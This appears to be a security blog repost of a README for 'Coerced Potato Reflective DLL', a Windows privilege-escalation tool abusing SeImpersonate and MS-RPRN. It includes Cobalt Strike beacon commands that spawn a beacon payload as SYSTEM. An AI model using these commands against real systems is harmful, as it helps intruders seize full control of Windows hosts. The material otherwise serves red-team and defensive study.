Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.

Heavily bas ed

Reflective Loader from

Install

Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.

Usage

You first need to spawn the RPC listener with

beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument

for example

beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin

then you can trigger a SYSTEM call

beacon> CoercedPotato coerce

Coerced Potato – Windows Privilege Escalation

October 17, 2023

In "Cyber security"

DazzleUP : A Tool That Detects The Privilege Escalation Vulnerabilities

August 9, 2020

In "Kali Linux"

Elevation Station: Mastering Privilege Escalation with Advanced Token Manipulation Techniques

December 11, 2023

In "Cyber security"

Varshini

Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.

Next Osquery-Defense-Kit : Enhancing Cybersecurity »

Previous « Exploiting CVE-2023-49103: A Python Script for Rapid phpinfo() Detection

How to Fix MyISAM Table Corruption in MySQL?

In MySQL Server 5.5 and earlier versions, the MyISAM was the default storage engine. So,…

16 hours ago

Vulnerability Analysis

Microsoft Authenticator Flaw Could Leak Login Codes

A newly disclosed vulnerability in Microsoft Authenticator could expose one time sign in codes or…

1 day ago

software

Modrinth – A Comprehensive Overview of Tools and Functions

Modrinth is a modern platform that’s rapidly changing the landscape of Minecraft modding, providing an…

2 days ago

News

BlackSanta Malware A Stealthy Threat Targeting Recruiters and HR Teams

A new, highly sophisticated malware campaign named BlackSanta has emerged, primarily targeting HR and recruitment…

2 days ago

TECH

Perplexity Launches Personal Computer Features

Perplexity has unveiled an exciting new feature, Personal Computer, which allows AI agents to seamlessly…

2 days ago

Cyber security

Cyberattack or Smoke and Mirrors? The Truth Behind the Alleged Dimona Nuclear Breach

In a recent cyber incident, a group named CARDINAL, associated with the label Russian Legion,…

3 days ago

Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Install

Usage

Related

Coerced Potato – Windows Privilege Escalation

DazzleUP : A Tool That Detects The Privilege Escalation Vulnerabilities

Elevation Station: Mastering Privilege Escalation with Advanced Token Manipulation Techniques

Recent Posts

How to Fix MyISAM Table Corruption in MySQL?

Microsoft Authenticator Flaw Could Leak Login Codes

Modrinth – A Comprehensive Overview of Tools and Functions

BlackSanta Malware A Stealthy Threat Targeting Recruiters and HR Teams

Perplexity Launches Personal Computer Features

Cyberattack or Smoke and Mirrors? The Truth Behind the Alleged Dimona Nuclear Breach

Coerced Potato Reflective DLL – Unveiling Privilege Escalation From NT Service To SYSTEM

Install

Usage

Related

Related Post

Recent Posts

Headline